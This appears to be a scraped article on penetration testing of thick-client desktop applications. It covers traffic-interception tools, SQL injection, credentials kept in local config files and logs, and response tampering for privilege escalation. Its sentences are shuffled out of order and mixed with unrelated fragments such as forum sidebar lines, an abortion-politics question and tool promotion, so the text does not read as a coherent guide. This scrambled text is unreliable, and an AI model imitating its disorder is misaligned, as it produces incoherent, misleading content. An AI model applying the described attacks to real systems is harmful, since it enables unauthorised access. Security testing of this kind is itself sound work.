Most of the applications we test does not validate the timestamp directly accepting the local system time from user, performing malicious transactions via changing the system time leads to inconsistency of the application logs. By instructing the client to open its connection to the ITR instead of the server, the entire connection is shifted to work through the ITR, without the client or the server noticing a difference. As a result both the request as well as response modifications play a key role in testing the thick client for vulnerabilities. Do note performing thick client sql injection needs patience and is a time consuming task. The sensitive data stored by these apps usually include username, passwords, database credentials, license details, cryptographic keys, and configuration details like IP address, port, etc…. Samrat Das is an expert security consultant who deals with any problems given to him with ease. Why is two-tier inherently more vulnerable than three-tier? When a user enters the user name and password in the application, the application sends a SQL query to the database containing the username to retrieve the user credentials. A thick client application writing/storing application logs containing sensitive details like user accounts, trading details, last login date and time, etc… on the user machine. Here our main goal is to test all the input parameters for different types of attacks which includes: SQL injection is one of the prime attacks you can carry onto a thick client’s database. Echo Mirage can also be useful in capturing data from JAVAApplets. For an easy to understand approach, thick clients are applications which are deployed locally on our systems. Grate blog !! We can break down the different types of pen testing a thick client into: Dynamic testing generally follows data flow from the client side to server side. The application will send a SQL query to the database with the username entered, and retrieve the correct password. your coworkers to find and share information. Here the bulk of processing and operations are performed on the client side, while the database operations and queries once executed makes the data processed and stored on the database. Examples of thin client application are web-sites like google.com or yahoo.com. Even checking of certain parameters can be easily disabled with a value =yes with = no! This is the alternate and well-structured 3-tier architecture. Test case for this involves:  if the application validates the DLLs used by the application. For capturing data from a JAVA applet, inject Echo Mirage into the process “java.exe”. Let us know your favorite tool for automation testing of JAVA based applications. This article gave you a brief idea of how to go about testing an application. In this option, the path of the application is provided into the Echo Mirage tool and it launches the selected application. Automation Testing Tools: The Ultimate Guide For 2020. List of tools that can used intercepting thick client applications: Echo Mirage is a network proxy tool that uses DLL injection and function hooking techniques to intercept the traffic transmitted and received by the local applications. A thick client is one of the components in client-server computing architecture that is connected to the server through a network connection and doesn’t consume any of the server's computing resources to execute applications. i would recommend you HP Load Runner tools set. The table below distinguishes the vulnerabilities faced by a web based and a thick client application: Not applicable – browser based vulnerability. During installation, a two tier thick client application stores a configuration file locally on the machine containing the database IP, port, username and password locally. This site uses Akismet to reduce spam. Other vulnerabilities that can be tested for in thick client apps are as follows: Fill out the form below to download the Thick Client Application Security PDF, [download]Click Here to Download[/download]. In the following sections, we will discuss the critical vulnerabilities faced by thick client application. Consider a thick client applications that displays the GUI(modules/sub-modules) based on the response parameters received from the server after authentication. A thick client is a computing workstation that includes most or all of the components essential for operating and executing software applications independently. These kinds of thick client applications involve three tiers, wherein the client talks to the application server, which in turn talks to the database. ITR serves as a TCP tunnel between the client and the server. Thick clients are majorly used across organizations for their internal operations. The screenshot below shows the Gtalk traffic intercepted by the Echo Mirage tool. He is currently a security researcher at Infosec Institute and works for a leading IT company. Finding the right testing tool from all the available automation testing tools is tough.. I’ve interviewed over 300 testers and developers on my TestGuild Automation podcast (formally named TestTalks). In this type, the application is installed on the client side, which directly communicates with the database on the server. Each and every topic are covered in this blog about client-server testing . Does the European right at large oppose abortion? I am not sure if you can combine all of these but you should be able i guess. Refer towww.owasp.org for more details on the vulnerabilities listed above. You need to iterate multiple queries with a mix and match by observing response to each of them. Thick client applications involve both local and server-side processing and often use proprietary protocols for communication. Mallory is a proxy tool that can intercept TCP and UDP traffic and can be used to capture network traffic or thick client applications using both HTTP(S) and non-HTTP(S) traffic. In order to assess the application for sensitive data storage, we need to analyze the files and registries used by the application. By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy. Additionally, thick clients often require specific applications, again posing more work and limitations for deployment. Zero-configuration, automated, random testing tools for web-apps? This can be configured within a virtual machine environment using only network interfaces. Here is a list of tools which are commonly used for performing thick client pentesting: That’s all readers for now. Thick client applications are not new having been in existence for a long time, however if given to perform a pentest on thick clients, it is not as simple as a Web Application Pentest. The communication in these applications is carried out using HTTP/HTTPS. BURPProxy is an intercepting proxy server for security testing of web applications. (node). Referenced under multiple names, such as: Fat client/Heavy client/Rich client/Thick client, such applications follow a client–server architecture. Any single tool I can use for this? This tool can be used to study the non-encrypted traffic sent by the thick client application. Making statements based on opinion; back them up with references or personal experience. Echo Mirage can be run in two different modes: By launching an executable from Echo Mirage. For example,when an Admin logs in, the response sent by the application is as follows: When a low privileged user logs in, the response sent by the application is as follows: Exploit: In this case, the attacker or the lower privileged user will intercept the response and modify the User and Account_No parameter to that of the Admin and get access to the administrator module. Traffic can be intercepted in real-time or manipulated with regular expressions and a number of action directives. Is it ethical to award points for hilariously bad answers? To maintain a thick client, IT needs to maintain all systems for software deployment and upgrades, rather than just maintaining the applications on the server. Exploit: An attacker might get access to this configuration file containing the database connectivity details. Writing letter of recommendation for someone I have never met. Typical examples of thick clients are G-Talk, Yahoo Messenger, Microsoft Outlook,online trading portals,etc…. You can also try trial version. Set the Process Monitor tool to intercept the registry activity as shown below: Analyze the registries accessed by the application to check for sensitive details like keys, encrypted passwords, etc…. A thick client, also known as Fat Client is a client in client–server architecture or network and typically provides rich functionality, independent of the server. More details can be found here:http://www.wireshark.org/. The complete processing is carried out on the server. http://download.cnet.com/Interactive-TCP-Relay/3000-2383_4-10239124.html.